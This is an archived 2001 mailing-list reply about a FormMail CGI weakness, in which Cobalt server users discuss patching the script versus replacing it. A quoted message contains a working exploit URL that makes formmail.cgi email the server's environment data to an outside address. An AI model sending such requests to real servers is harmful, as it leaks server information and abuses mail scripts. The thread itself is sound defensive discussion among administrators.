[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] CGI email

Subject: Re: [cobalt-users] CGI email
From: Aeron Jarrett <ajarrett@xxxxxxxxxxxxx>
Date: Wed May 16 14:32:12 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

On Thu, 10 May 2001, Keith Davis wrote:

|Dan Kriwitsky wrote:
|
|> Checking what out? The expoit they published works.
|> Exploit:
|> http://www.example.com/cgi-bin/formmail.cgi?env_report=PATH&recipient=cache@
|> dowebs.com&required=&firstname=&lastname=&email=&message=&Submit=<message>
|> 
|
|Exactly my point. It's a feature that does indeed work. It's also a
|feature that can be turned off in at least 3 places in the script.
<snip></snip>
|I just hate to see someone being told he has to install something else
|and tell his clients that they have to redo all those forms that they
|probably didn't understand the first time, when patching what he has
|will take only a few minutes.
|

Good view, Keith. I dind't take the time to see if there was a way to fix
this although I was sure that it was there, from my experience with CGI
scripts. But I like the change that I made to alienform... though I think
I might have some forms out there that still point to the old form mail
script.

References:
- Re: [cobalt-users] CGI email
  - From: Keith Davis

Prev by Date: [cobalt-users] Pointing Domain to outside IP but keeping Mail...
Next by Date: Re: [cobalt-users] IMAP & Webmail
Previous by thread: Re: [cobalt-users] CGI email
Next by thread: RE: [cobalt-users] CGI email

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index